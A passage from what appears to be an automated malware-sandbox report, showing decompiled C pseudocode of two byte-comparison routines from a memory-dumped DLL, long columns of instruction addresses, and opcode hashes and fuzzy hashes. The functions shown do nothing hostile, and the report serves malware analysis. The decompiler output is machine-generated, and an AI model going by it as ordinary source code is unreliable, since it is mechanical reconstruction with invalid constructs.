									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                            0x10006b17
                                            0x10006b17
                                            0x10006b1d
                                            0x10006ba5
                                            0x10006ba7
                                            0x10006ba9
                                            0x00000000
                                            0x00000000
                                            0x10006baf
                                            0x10006bb5
                                            0x10006c3c
                                            0x10006c3e
                                            0x10006c40
                                            0x00000000
                                            0x00000000
                                            0x10006c46
                                            0x10006c4c
                                            0x10006cd3
                                            0x10006cd5
                                            0x10006cd7
                                            0x00000000
                                            0x00000000
                                            0x10006cdd
                                            0x10006ce3
                                            0x10006d6a
                                            0x10006d6c
                                            0x10006d6e
                                            0x00000000
                                            0x00000000
                                            0x10006d7a
                                            0x10006e02
                                            0x10006e04
                                            0x10006e06
                                            0x00000000
                                            0x00000000
                                            0x10006e0c
                                            0x10006e12
                                            0x10006e99
                                            0x10006e9b
                                            0x10006e9d
                                            0x00000000
                                            0x00000000
                                            0x10006ea3
                                            0x10006ea9
                                            0x10006f30
                                            0x10006f32
                                            0x10006f34
                                            0x00000000
                                            0x00000000
                                            0x10006f42
                                            0x10006f44
                                            0x10006f5c
                                            0x10006f64
                                            0x10006f66
                                            0x100066bf
                                            0x100066c7
                                            0x100066c9
                                            0x100066d6
                                            0x100066d6
                                            0x00000000
                                            0x100066c9
                                            0x10006f73
                                            0x100066b9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100066b9
                                            0x10006f4d
                                            0x10006f56
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006f56
                                            0x10006eb6
                                            0x10006eb8
                                            0x10006ed0
                                            0x10006ed8
                                            0x10006eda
                                            0x10006ef2
                                            0x10006efa
                                            0x10006efc
                                            0x10006f14
                                            0x10006f1c
                                            0x10006f1e
                                            0x10006f27
                                            0x10006f27
                                            0x00000000
                                            0x10006f1e
                                            0x10006f05
                                            0x10006f0e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006f0e
                                            0x10006ee3
                                            0x10006eec
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006eec
                                            0x10006ec1
                                            0x10006eca
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006eca
                                            0x10006e1f
                                            0x10006e21
                                            0x10006e39
                                            0x10006e41
                                            0x10006e43
                                            0x10006e5b
                                            0x10006e63
                                            0x10006e65
                                            0x10006e7d
                                            0x10006e85
                                            0x10006e87
                                            0x10006e90
                                            0x10006e90
                                            0x00000000
                                            0x10006e87
                                            0x10006e6e
                                            0x10006e77
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006e77
                                            0x10006e4c
                                            0x10006e55
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006e55
                                            0x10006e2a
                                            0x10006e33
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006e33
                                            0x10006d88
                                            0x10006d8a
                                            0x10006da2
                                            0x10006daa
                                            0x10006dac
                                            0x10006dc4
                                            0x10006dcc
                                            0x10006dce
                                            0x10006de6
                                            0x10006dee
                                            0x10006df0
                                            0x10006df9
                                            0x10006df9
                                            0x00000000
                                            0x10006df0
                                            0x10006dd7
                                            0x10006de0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006de0
                                            0x10006db5
                                            0x10006dbe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006dbe
                                            0x10006d93
                                            0x10006d9c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006d9c
                                            0x10006cf0
                                            0x10006cf2
                                            0x10006d0a
                                            0x10006d12
                                            0x10006d14
                                            0x10006d2c
                                            0x10006d34
                                            0x10006d36
                                            0x10006d4e
                                            0x10006d56
                                            0x10006d58
                                            0x10006d61
                                            0x10006d61
                                            0x00000000
                                            0x10006d58
                                            0x10006d3f
                                            0x10006d48
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006d48
                                            0x10006d1d
                                            0x10006d26
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006d26
                                            0x10006cfb
                                            0x10006d04
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006d04
                                            0x10006c59
                                            0x10006c5b
                                            0x10006c73
                                            0x10006c7b
                                            0x10006c7d
                                            0x10006c95
                                            0x10006c9d
                                            0x10006c9f
                                            0x10006cb7
                                            0x10006cbf
                                            0x10006cc1
                                            0x10006cca
                                            0x10006cca
                                            0x00000000
                                            0x10006cc1
                                            0x10006ca8
                                            0x10006cb1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006cb1
                                            0x10006c86
                                            0x10006c8f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006c8f
                                            0x10006c64
                                            0x10006c6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006c6d
                                            0x10006bc2
                                            0x10006bc4
                                            0x10006bdc
                                            0x10006be4
                                            0x10006be6
                                            0x10006bfe
                                            0x10006c06
                                            0x10006c08
                                            0x10006c20
                                            0x10006c28
                                            0x10006c2a
                                            0x10006c33
                                            0x10006c33
                                            0x00000000
                                            0x10006c2a
                                            0x10006c11
                                            0x10006c1a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006c1a
                                            0x10006bef
                                            0x10006bf8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006bf8
                                            0x10006bcd
                                            0x10006bd6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006b23
                                            0x10006b27
                                            0x10006b2b
                                            0x10006b2d
                                            0x10006b45
                                            0x10006b45
                                            0x10006b4d
                                            0x10006b4f
                                            0x10006b67
                                            0x10006b67
                                            0x10006b6f
                                            0x10006b71
                                            0x10006b89
                                            0x10006b89
                                            0x10006b91
                                            0x10006b93
                                            0x10006b9c
                                            0x10006b9c
                                            0x00000000
                                            0x10006b93
                                            0x10006b77
                                            0x10006b7a
                                            0x10006b83
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006b83
                                            0x10006b55
                                            0x10006b58
                                            0x10006b61
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006b61
                                            0x10006b33
                                            0x10006b36
                                            0x10006b3f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006b3f
                                            0x100062a5
                                            0x100062a5
                                            0x10007096

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction ID: c22180dd41322938c5145983b595c2607b659793927d401415bf2d4ba45eef17
                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction Fuzzy Hash: 76C170722155930AFB5DCA79C83413FBAE2EB966F1327076DD4B2DB1C8EE20C564D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 100062AD, Relevance: .3, Instructions: 331COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E100062AD(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                            0x100062ad
                                            0x100062ad
                                            0x100062b3
                                            0x1000632a
                                            0x1000632c
                                            0x1000632e
                                            0x00000000
                                            0x00000000
                                            0x10006334
                                            0x1000633a
                                            0x100063c1
                                            0x100063c3
                                            0x100063c5
                                            0x00000000
                                            0x00000000
                                            0x100063cb
                                            0x100063d1
                                            0x10006458
                                            0x1000645a
                                            0x1000645c
                                            0x00000000
                                            0x00000000
                                            0x10006462
                                            0x10006468
                                            0x100064ef
                                            0x100064f1
                                            0x100064f3
                                            0x00000000
                                            0x00000000
                                            0x100064f9
                                            0x100064ff
                                            0x10006586
                                            0x10006588
                                            0x1000658a
                                            0x00000000
                                            0x00000000
                                            0x10006596
                                            0x1000661e
                                            0x10006620
                                            0x10006622
                                            0x00000000
                                            0x00000000
                                            0x10006628
                                            0x1000662e
                                            0x100066b5
                                            0x100066b7
                                            0x100066b9
                                            0x100066c7
                                            0x100066c9
                                            0x100066d6
                                            0x100066d6
                                            0x100066c9
                                            0x00000000
                                            0x100066b9
                                            0x1000663b
                                            0x1000663d
                                            0x10006655
                                            0x1000665d
                                            0x1000665f
                                            0x10006677
                                            0x1000667f
                                            0x10006681
                                            0x10006699
                                            0x100066a1
                                            0x100066a3
                                            0x100066ac
                                            0x100066ac
                                            0x00000000
                                            0x100066a3
                                            0x1000668a
                                            0x10006693
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006693
                                            0x10006668
                                            0x10006671
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006671
                                            0x10006646
                                            0x1000664f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000664f
                                            0x100065a4
                                            0x100065a6
                                            0x100065be
                                            0x100065c6
                                            0x100065c8
                                            0x100065e0
                                            0x100065e8
                                            0x100065ea
                                            0x10006602
                                            0x1000660a
                                            0x1000660c
                                            0x10006615
                                            0x10006615
                                            0x00000000
                                            0x1000660c
                                            0x100065f3
                                            0x100065fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100065fc
                                            0x100065d1
                                            0x100065da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100065da
                                            0x100065af
                                            0x100065b8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100065b8
                                            0x1000650c
                                            0x1000650e
                                            0x10006526
                                            0x1000652e
                                            0x10006530
                                            0x10006548
                                            0x10006550
                                            0x10006552
                                            0x1000656a
                                            0x10006572
                                            0x10006574
                                            0x1000657d
                                            0x1000657d
                                            0x00000000
                                            0x10006574
                                            0x1000655b
                                            0x10006564
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006564
                                            0x10006539
                                            0x10006542
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006542
                                            0x10006517
                                            0x10006520
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006520
                                            0x10006475
                                            0x10006477
                                            0x1000648f
                                            0x10006497
                                            0x10006499
                                            0x100064b1
                                            0x100064b9
                                            0x100064bb
                                            0x100064d3
                                            0x100064db
                                            0x100064dd
                                            0x100064e6
                                            0x100064e6
                                            0x00000000
                                            0x100064dd
                                            0x100064c4
                                            0x100064cd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100064cd
                                            0x100064a2
                                            0x100064ab
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100064ab
                                            0x10006480
                                            0x10006489
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006489
                                            0x100063de
                                            0x100063e0
                                            0x100063f8
                                            0x10006400
                                            0x10006402
                                            0x1000641a
                                            0x10006422
                                            0x10006424
                                            0x1000643c
                                            0x10006444
                                            0x10006446
                                            0x1000644f
                                            0x1000644f
                                            0x00000000
                                            0x10006446
                                            0x1000642d
                                            0x10006436
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006436
                                            0x1000640b
                                            0x10006414
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006414
                                            0x100063e9
                                            0x100063f2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100063f2
                                            0x10006347
                                            0x10006349
                                            0x10006361
                                            0x10006369
                                            0x1000636b
                                            0x10006383
                                            0x1000638b
                                            0x1000638d
                                            0x100063a5
                                            0x100063ad
                                            0x100063af
                                            0x100063b8
                                            0x100063b8
                                            0x00000000
                                            0x100063af
                                            0x10006396
                                            0x1000639f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000639f
                                            0x10006374
                                            0x1000637d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000637d
                                            0x10006352
                                            0x1000635b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100062b5
                                            0x100062b5
                                            0x100062bc
                                            0x100062be
                                            0x100062d2
                                            0x100062d2
                                            0x100062da
                                            0x100062dc
                                            0x100062f0
                                            0x100062f0
                                            0x100062f8
                                            0x100062fa
                                            0x1000630e
                                            0x1000630e
                                            0x10006316
                                            0x10006318
                                            0x10006321
                                            0x10006321
                                            0x00000000
                                            0x10006318
                                            0x10006300
                                            0x10006303
                                            0x1000630c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000630c
                                            0x100062e2
                                            0x100062e5
                                            0x100062ee
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100062ee
                                            0x100062c4
                                            0x100062c7
                                            0x100062d0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100062d0
                                            0x100062a5
                                            0x100062a5
                                            0x10007096

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction ID: f98c86527ad7a144efb2675a7ed10b3c8958d79e2d9031d2d4aabe74ee8549b4
                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction Fuzzy Hash: BAC173722055930AFF4DCA798C3413FBAE2EB966F1327176DD8B2DB1C9EE10C5649620
